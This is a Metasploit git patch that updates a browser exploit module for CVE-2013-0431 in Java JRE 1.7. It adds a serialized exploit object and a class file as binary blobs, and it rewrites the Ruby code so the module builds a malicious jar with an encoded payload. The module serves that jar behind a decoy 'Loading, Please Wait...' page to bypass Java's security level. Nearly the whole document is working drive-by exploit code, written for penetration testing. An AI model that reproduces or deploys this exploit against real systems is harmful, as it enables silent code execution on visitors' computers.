From d7b89a22281d72089b0357dbe3904fdc8804601c Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Wed, 20 Feb 2013 17:50:47 +0100
Subject: [PATCH] added security level bypass

---
 data/exploits/cve-2013-0431/Exploit.class     | Bin 2743 -> 2744 bytes
 data/exploits/cve-2013-0431/Exploit.ser       | Bin 0 -> 1517 bytes
 .../multi/browser/java_jre17_jmxbean_2.rb     |  57 ++++++++----------
 3 files changed, 25 insertions(+), 32 deletions(-)
 create mode 100755 data/exploits/cve-2013-0431/Exploit.ser

diff --git a/data/exploits/cve-2013-0431/Exploit.class b/data/exploits/cve-2013-0431/Exploit.class
index 526a59dbaf3d13c6c037fb0b22cd78fd6a6ae2e5..f76c43d3e17695bf6e445aec23cff58a1de7daef 100755
GIT binary patch
delta 16
Ycmdlkx<horC05qrlEk8o*B){L06JC&F#rGn

delta 15
XcmdlXx?Oa_B^H*<yv&W)A94Z!Gk^xR

diff --git a/data/exploits/cve-2013-0431/Exploit.ser b/data/exploits/cve-2013-0431/Exploit.ser
new file mode 100755
index 0000000000000000000000000000000000000000..e20823fe43bfaf8e907d250ac3e3954b3259d2a4
GIT binary patch
literal 1517
zcmZ`(&2Jk;6n}Bz*l|ho(FRdbK7^`PLRBm-NGKo?>_jqk<*2SIVV@?u&+BQ&GsDcR
zz1u^@l><jEzy*m92_f$M1Dv=cap2fP1%Chs1aHRcb<&oVyxw{9dtblz@#9}mwFYWO
znHGw>&vg6dYuAVM3P5IH_dc7leWtZQw|^M^e)@O#-k;aM{kZ}wUD#n!gx2y?fh{E+
zX3oKlu2;&Miz_a;%bSN!0}sgj#ku*J+dp9v#qZbNd~5shr9aO3rb};{af#;r+9&p(
z%P-tmg?a~GjTYiQ8qNfNh;f@ab`Oo^N)F)SNJXh_<&nTUO1S}C4T8IdO$oxpi4r`@
zPmG%K7)=K*$Vg4Jk|>=W!bW*;ur~}jHQCHHTMNuV7aB3Qnz?9<#=+}LOqVBPH$(q!
zmk7dd2$rkV-A)Mp(i!+%$|OtB5Ue&~S)bBzaCr%8^9f3ym?y5NOW>vm`ST~=ee~PA
z-+ZwO*9P!1OPxCQ=~K4Sj?na^k3>=09jKqGRK~Wa1Br$H|BzTi$*8*Vhp>TDV&*op
z4+e1MJd?LDw?}i_05-y%SL(p}IFK-aO`b?)@D6G!r0c*{ZWrN&Vi3AVABM*<Qt9g4
zp0MZv#sg>+Wb~0L*qCtXnF)s-$tLLAmPg!)JjgaB&W?PXwkJhCfD78-sMM%VsZGdc
zZOTK>cAz@ru^V?_C8J;dyoUZ59zlgleM<2p#uMjYds&v263W+XGa56QU_aGb8JdDO
z=8#h)`kT~anpz}poyCySdXySVaM(FxFo@`~5tG(kW)dWGSC)WS#?5wlbufh8XNy50
z7A>1PE}BFQ8C)CDz&O}inmQ(d_cWr?%yaYEHYhNmB1SV0yK```(hV}gFZ$Di>;5<|
zN^xBCWhpfUvC`~2!(~F6b&Y7eSC8EyKU(Qj+Y%l8+{4HPPV0-}1<RRU0f1Hdt@#gn
zwqd3CnxFmqoIpSI(4KpxTsh?+_Y9|oVUA|&mnYvJef?GRD=jzL2WokdX|i3@I$OF(
z&0;U?(_Ww@RSeR>-qxp^FFyVu^=r(lfhNC~O25ZK&AMUYzkK^vW%zgHoeHc|CsJ!B
z)cRZDzb8Ln76mQ64y=t6Mx$D%);{!@4(!>m@rq5?lf*Bw2_dJ13_b%5)goAbs1g;K
F{tskD^4tIb

literal 0
HcmV?d00001

diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
index 32301affd6..43c42c764d 100644
--- a/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
@@ -78,44 +78,37 @@ class Metasploit3 < Msf::Exploit::Remote
 		))
 	end
 
-
-	def setup
-		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "Exploit.class")
-		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-		path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0431", "B.class")
-		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
-
-		@exploit_class_name = rand_text_alpha("Exploit".length)
-		@exploit_class.gsub!("Exploit", @exploit_class_name)
-		super
-	end
-
 	def on_request_uri(cli, request)
 		print_status("handling request for #{request.uri}")
 
 		case request.uri
 		when /\.jar$/i
-			jar = payload.encoded_jar
-			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
-			jar.add_file("B.class", @loader_class)
-			metasploit_str = rand_text_alpha("metasploit".length)
-			payload_str = rand_text_alpha("payload".length)
-			jar.entries.each { |entry|
-				entry.name.gsub!("metasploit", metasploit_str)
-				entry.name.gsub!("Payload", payload_str)
-				entry.data = entry.data.gsub("metasploit", metasploit_str)
-				entry.data = entry.data.gsub("Payload", payload_str)
-			}
-			jar.build_manifest
+			paths = [
+				[ "Exploit.ser" ],
+				[ "Exploit.class" ],
+				[ "B.class" ]
+			]
 
-			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
-		when /\/$/
-			payload = regenerate_payload(cli)
-			if not payload
-				print_error("Failed to generate the payload.")
-				send_not_found(cli)
-				return
+			p = regenerate_payload(cli)
+
+			jar  = p.encoded_jar
+
+			paths.each do |path|
+				1.upto(path.length - 1) do |idx|
+					full = path[0,idx].join("/") + "/"
+					if !(jar.entries.map{|e|e.name}.include?(full))
+						jar.add_file(full, '')
+					end
+				end
+				fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2013-0431", path ), "rb")
+				data = fd.read(fd.stat.size)
+				jar.add_file(path.join("/"), data)
+				fd.close
 			end
+
+			print_status("Sending Applet.jar")
+			send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+		when /\/$/
 			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
 		else
 			send_redirect(cli, get_resource() + '/', '')
@@ -126,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def generate_html
 		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
 		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
-		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+		html += %Q|<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="sample.jar"></embed>|
 		html += %Q|</applet></body></html>|
 		return html
 	end